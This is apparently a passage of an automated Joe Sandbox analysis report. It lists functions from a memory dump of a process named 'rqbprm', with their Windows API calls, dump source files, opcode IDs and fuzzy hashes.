                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
                                                                                              • Instruction ID: e4c76a4f5647b3f0555573636fe7a96975df89a94068fa562e0df70ad740c618
                                                                                              • Opcode Fuzzy Hash: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
                                                                                              • Instruction Fuzzy Hash: AD01217A200348AADB10DFA4EC49F9E77BCEF59710F009426FA0597261D3709955CBA5
                                                                                              Function 00C66C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00C66DDF,00000000,00000400), ref: 00C66C74
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00C66C95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
                                                                                              • Instruction ID: b2ad58586fb15e3290469de67704853acb2dd7abc8400f4f46e6e829af1348d0
                                                                                              • Opcode Fuzzy Hash: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
                                                                                              • Instruction Fuzzy Hash: ADD0C931344300FFFA210B628D4AF2E7B99BF45B91F18D405B795E80E0CB789924E629
                                                                                              Function 00C7F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C7F66A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
                                                                                              • Instruction ID: 1fed3fc5efcfdff06eb4ec96c727ea89e414c3b8cae6cabb949b71f1556d9b63
                                                                                              • Opcode Fuzzy Hash: 1cecc15aac797d587bcd161e1ba05d3223ebbeca9a0ca0c05a3b63597024ec9f
                                                                                              • Instruction Fuzzy Hash: DC518DB19006198FDB29CF99E8C57AEB7F0FB48354F24C42AC819EB291D3749E01CB50
                                                                                              Function 00C6B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
                                                                                              • Instruction ID: fb95b9d9cfc655a2c18b2589f361ac6977d767a8c1787bc5b97ed20868afaf96
                                                                                              • Opcode Fuzzy Hash: 6c779ab4a92dd0c2e243c49e479a84fe66c42edb2966d684a068b3c02e77cb8f
                                                                                              • Instruction Fuzzy Hash: 7DF017B5E002589FDB28CB18EC967DE77F1EB9A719F144296D91593390C3B0AEC08E60
                                                                                              Function 00C7F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00C7F3A5), ref: 00C7F9DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
                                                                                              • Instruction ID: e3a645b8e1260b9208dee41286a75b1fd046cc77361ce5598377c2ba48c0425a
                                                                                              • Opcode Fuzzy Hash: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 00C8C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
                                                                                              • Instruction ID: 8e793f1571395e4a5cb43dbc64baa92e9d50b38c525bc5646f6a352d73a7ce0b
                                                                                              • Opcode Fuzzy Hash: 19f73ea02ff8537bd35afcc0881b6a9e6fb8fabf73bc5b19a27c6245992eb82a
                                                                                              • Instruction Fuzzy Hash: 5DA001706022419B97448F35AE4DB4D3AA9AA55691709406BA509C5170EB6489A0AA11
                                                                                              Function 00C6E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C6E30E
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CA1030,00000200,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4
                                                                                              • _strlen.LIBCMT ref: 00C6E32F
                                                                                              • SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00C6E3C9
                                                                                              • GetClientRect.USER32(?,?), ref: 00C6E3D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C6E475
                                                                                              • GetWindowRect.USER32(?,?), ref: 00C6E4A2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C6E4DB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00C6E4E3
                                                                                              • GetWindow.USER32(?,00000005), ref: 00C6E4EE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00C6E51B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00C6E58D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 3b18306f22232d81d7aa8d417bfdff66d6c00e861991658954945693f5e0ee04
                                                                                              • Instruction ID: b0f88ac38542fb171388f8b74ef0fecb72e6df3fb18c6fd7b85eb6f67f697e25
                                                                                              • Opcode Fuzzy Hash: 3b18306f22232d81d7aa8d417bfdff66d6c00e861991658954945693f5e0ee04
                                                                                              • Instruction Fuzzy Hash: EC81A072208341AFD720DFA8DC89F6FBBE9EB88704F04492DFA9597250D630E9058B52
                                                                                              Function 00C8CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00C8CB66
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C71E
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C730
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C742
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C754
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C766
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C778
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C78A
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C79C
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7AE
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7C0
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7D2
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7E4
                                                                                                • Part of subcall function 00C8C701: _free.LIBCMT ref: 00C8C7F6
                                                                                              • _free.LIBCMT ref: 00C8CB5B
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8CB7D
                                                                                              • _free.LIBCMT ref: 00C8CB92
                                                                                              • _free.LIBCMT ref: 00C8CB9D
                                                                                              • _free.LIBCMT ref: 00C8CBBF
                                                                                              • _free.LIBCMT ref: 00C8CBD2
                                                                                              • _free.LIBCMT ref: 00C8CBE0
                                                                                              • _free.LIBCMT ref: 00C8CBEB
                                                                                              • _free.LIBCMT ref: 00C8CC23
                                                                                              • _free.LIBCMT ref: 00C8CC2A
                                                                                              • _free.LIBCMT ref: 00C8CC47
                                                                                              • _free.LIBCMT ref: 00C8CC5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
                                                                                              • Instruction ID: e4e69ecf3299a9c23adf1e668390784d59bed757d2ea47ca20d2239ac73b9ef5
                                                                                              • Opcode Fuzzy Hash: d36fdb43792e4b3e5d6bf502dcafdb7910d6ecd01379b3226b7f9959c98109fb
                                                                                              • Instruction Fuzzy Hash: 61316F316007069FEB20BA38D886B6A77E9FF10318F51442AE168D7692DF31ED45DB28
                                                                                              Function 00C79711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C79736
                                                                                              • _wcslen.LIBCMT ref: 00C797D6
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00C797E5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00C79806
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C7982D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1777411235-4209811716
                                                                                              • Opcode ID: 3236b5a2b343bd75322f1171407933ffdedddb980e504a27162021979810a394
                                                                                              • Instruction ID: f747b29f675bdb2fc91974b908e12edcd8d01c688072aa163e9b8ec499e36c36
                                                                                              • Opcode Fuzzy Hash: 3236b5a2b343bd75322f1171407933ffdedddb980e504a27162021979810a394
                                                                                              • Instruction Fuzzy Hash: 3E3146321083517BEB29BB649C0AF6F77ACEF42714F14411EF515961D2EB70DA0583AA
                                                                                              Function 00C7D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00C7D6C1
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00C7D6ED
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7D709
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C7D720
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7D734
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C7D75D
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7D764
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00C7D76D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
                                                                                              • Instruction ID: cbdda10dc1f71700df7a2a38e4183d45739fbe0da16a32bec32b7ffd8f4833eb
                                                                                              • Opcode Fuzzy Hash: 13e60f8cf288e179fc78896953f5c2a4d2e97684d9afd1d0b55a108670f4b057
                                                                                              • Instruction Fuzzy Hash: 4F1133731007507FE7217BB0EC4AFAF766CAF44741F00C121FA6AA60D5DB648B0552B6
                                                                                              Function 00C896F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C89705
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C89711
                                                                                              • _free.LIBCMT ref: 00C8971C
                                                                                              • _free.LIBCMT ref: 00C89727
                                                                                              • _free.LIBCMT ref: 00C89732
                                                                                              • _free.LIBCMT ref: 00C8973D
                                                                                              • _free.LIBCMT ref: 00C89748
                                                                                              • _free.LIBCMT ref: 00C89753
                                                                                              • _free.LIBCMT ref: 00C8975E
                                                                                              • _free.LIBCMT ref: 00C8976C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
                                                                                              • Instruction ID: f826fc38464521f8c8b0ef3134ef16127ceaf55298ba7f257352c515771fa5ea
                                                                                              • Opcode Fuzzy Hash: bd03b2a80e1e8e7ff9f20dbfbf954f4fd8467fd98d00a86d284bfa19c8fd80c1
                                                                                              • Instruction Fuzzy Hash: 2B11B97511010ABFCB01FF54C942CDD3BB6EF14354B9255A2FA084F662DE31DE55AB88
                                                                                              Function 00C82E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
                                                                                              • Instruction ID: 86c9dffc08ad6ee9cd72672f9ee8500680c59715d8ae11ec09520f6ecb1033b1
                                                                                              • Opcode Fuzzy Hash: 768215b831e06710d2cd8ba5e13bc645f86216935d89f873b5496d59aadd9ccf
                                                                                              • Instruction Fuzzy Hash: 4BB19B31800259EFCF29FFA4C8889AEBBB5BF04B18F14515AF8116B212D731DB51DB99
                                                                                              Function 00C66FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C66FAA
                                                                                              • _wcslen.LIBCMT ref: 00C67013
                                                                                              • _wcslen.LIBCMT ref: 00C67084
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3122303884-3508440684
                                                                                              • Opcode ID: 5213c64c94bfe0a1aa8d504b00120319dead7d3ae6e1b4c1e9a0c51b782d71a1
                                                                                              • Instruction ID: ece9460c58016f4f291399e50810e15317ad6d6124b2728cbc7e9e6387ab536c
                                                                                              • Opcode Fuzzy Hash: 5213c64c94bfe0a1aa8d504b00120319dead7d3ae6e1b4c1e9a0c51b782d71a1
                                                                                              • Instruction Fuzzy Hash: E04106B1D08384BAEF30A7709CC6FEE776C9F05308F044956FA59A6182D774AB449B25
                                                                                              Function 00C7B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
